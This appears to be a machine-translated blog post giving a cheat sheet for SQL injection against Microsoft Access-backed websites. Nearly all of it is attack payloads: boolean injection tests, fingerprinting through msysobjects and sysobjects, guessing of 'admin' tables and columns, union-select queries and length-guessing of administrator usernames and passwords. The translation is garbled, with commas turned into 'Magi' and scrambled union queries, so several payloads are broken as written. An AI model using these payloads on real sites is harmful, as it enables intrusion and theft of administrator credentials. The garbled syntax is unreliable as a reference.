Shulou(Shulou.com)06/01 Report--

Access database

Advantages: increase speed and reduce code volume

Disadvantages: excessive data, poor performance and low security

Suffix: .mdb

Open tool: courtier database browser, barrier breaking browser

Access injection

Judge the injection point:', and1= 1, and1=2, or 1, or 1, and1= 23, add a minus sign after id= to report an error.

Determine the database type: and exists (select * from msysobjects) > 0 means access database, while and exists (select * from sysobjects) > 0 means sql server database

Judge the table in the database: and exists (select * from admin) returns a success indicating that it exists

Tables in access's database: admin,msysobjects,user,username

Determine the field name in the table in the database: and exists (select username from admin) returns a success indicating that it exists.

Determine the field length: order by N

Error report: and 1 union select 2 Magi 2 Magi N from admin (joint query)

Determine the password length of the account: and (select len (admin) from admin) = 5. If normal is returned, the length of the administrative account is 5.

And (select len (password) from admin) = 5 guess the administrative password length is 5

Offset injection

It is mainly used to solve the situation where the table name is guessed and the column name is not guessed.

And 1 fields 2 union select 1 from admin N query (joint query), replaced one by one from the last field until the display is normal, * represents the fields in all the data tables

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.